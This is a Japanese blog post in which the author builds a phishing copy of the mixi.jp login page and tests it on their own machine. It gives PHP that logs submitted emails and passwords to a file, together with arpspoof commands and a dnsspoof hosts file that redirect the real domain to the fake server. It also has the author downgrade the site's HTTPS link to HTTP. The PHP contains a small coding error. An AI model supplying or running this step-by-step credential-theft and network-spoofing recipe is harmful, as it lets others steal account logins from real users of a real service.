フィッシングサイトを自作自演してみた arpspoof,dnsspoof,mixi

/ Linux/Unix / Comment[0]
http://mixi.jp
にウェブブラウザでアクセスしてCTRL+Sで保存

フォームのhtmlをviで開いてフィッシング仕様に編集


・<form action="~~~"の~~~を削除
・postメソッドをログファイルに出力するphpを書き足す
<?php
$fp = fopen('./fisshing.log', 'a');
$usr = $_POST['email'];
$pw = $_POST['password'];
$fwrite($fp, "$usr,$pw\n");
fclose($fp);
?>

・index.phpというファイル名に変更
・「SSL(https)はこちら」のリンクをhttpに書き換える
・必要に応じてApache2,php5をインストール、httpd.confを編集


公開ディレクトリにうpして確認


正常にフォームに入力した内容が./fisshing.logファイルに出力されるのを確認出来たらおk。
fishingだろっていうツッコミは無しで

これでフィッシング鯖本体は完成。


このままじゃアドレスバーを見る中級者以上の人(もちろん想定の人)にバレてしまうので
URLを偽装するためにarpspoofとdnsspoofを使う。

前の記事のarpspoofを使ったパケット盗聴と同じように
arpspoofでゲートウェイになりすまし、正規ホストとの間に入り込み、dnsspoofを起動する

# sysctl -w net.ipv4.ip_forward=1
# sysctl -w net.ipv4.conf.eth0.send_redirects=0
# arpspoof 10.25.0.1 -t 10.0.0.1

正規ホストとゲートウェイの間に入り込むことでdnsspoofの応答が正規DNSサーバ(192.168.1.1)より速く届くので、
確実にspoof出来る。

dnsspoofで使うホストファイルを作成 書式は/etc/hostsと同じ
# vi hosts.file
10.10.0.1  mixi.jp

dnsspoofを起動
# dnsspoof -f hosts.file


あとは俺が引っかかるまで待つだけ

URLがmixi.jpで本物のサイトなのかフィッシングサイトなのか見た目だけでは分からない
てきとーにアカウントを入力してみる

攻撃者のターミナル

やーいひっかかったひっかかったー
悪用はしないでね
関連記事

コメント

:
:
:
:
:
管理人のみ表示を許可